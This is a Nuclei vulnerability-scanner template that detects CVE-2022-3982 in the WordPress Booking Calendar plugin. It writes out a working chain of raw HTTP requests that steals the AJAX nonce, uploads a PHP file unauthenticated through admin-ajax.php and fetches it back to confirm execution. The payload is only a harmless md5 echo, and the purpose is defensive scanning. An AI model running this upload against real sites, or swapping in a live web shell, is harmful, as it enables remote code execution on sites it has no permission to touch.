nuclei-templates/cves/2022/CVE-2022-3982.yaml


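id: CVE-2022-3982

# Nuclei template: confirms CVE-2022-3982 by exercising the plugin's
# unauthenticated admin-ajax upload handler and then fetching the uploaded
# file back from the public uploads directory.
#
# Operational caveats for whoever runs this:
#   * It is INTRUSIVE. Request 2 writes a real PHP file to
#     /wp-content/uploads/booking_calendar/ on the target and nothing in the
#     template removes it. The payload only echoes a constant, but it is still
#     an executable file left behind; delete it after the scan.
#   * Request 1 only exists to harvest the plugin's AJAX nonce from the JS
#     emitted on the site root. If the booking form is not rendered on "/",
#     the extractor finds nothing and the check will not fire — a miss here is
#     a false negative, not a clean bill of health.
info:
  name: Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The Booking calendar, Appointment Booking System WordPress plugin before 3.2.2 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
  remediation: Fixed in 3.2.2
  reference:
    - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867
    - https://wordpress.org/plugins/booking-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3982
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3982
    cwe-id: CWE-434
  metadata:
    verified: "true"
    # Three raw requests per target (nonce fetch, upload, fetch-back).
    max-request: 3
  # "intrusive" added: the template modifies target state (file upload), so it
  # must be excluded from passive / production-safe runs (-etags intrusive).
  tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive

requests:
  - raw:
      # Request 1: load the site root so the "ajaxNonce" extractor below can
      # pull the plugin's nonce out of the inline "var wpdevart..." script.
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      # Request 2: the vulnerable handler. Unauthenticated multipart POST to
      # admin-ajax.php with action=wpdevart_form_ajax; the "file" part carries
      # a .php payload. Boundary in the body is the header boundary prefixed
      # with "--", as RFC 2046 requires. The blank lines separating part
      # headers from part bodies are significant.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54

        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="action"

        wpdevart_form_ajax
        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="wpdevart_id"

        x
        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="wpdevart_nonce"

        {{nonce}}
        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="wpdevart_data"

        {"wpdevart-submit":"X"}
        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="wpdevart-submit"

        1
        --------------------------1cada150a8151a54
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("CVE-2022-3982"); ?>
        --------------------------1cada150a8151a54--

      # Request 3: fetch the uploaded file from the plugin's upload directory.
      # {{randstr}} resolves to the same value used in the filename above, so
      # this path only exists if the upload in request 2 succeeded.
      - |
        GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      # Internal-only: feeds {{nonce}} into request 2, never reported.
      - type: regex
        name: nonce
        internal: true
        group: 1
        regex:
          - 'var wpdevart.*"ajaxNonce":"(.*?)"'

    matchers:
      # Vulnerable only if the fetched file was actually executed as PHP:
      # 200 + HTML content type + the md5 constant the payload prints. A raw
      # (unexecuted) echo of the source would not contain the digest.
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
        condition: and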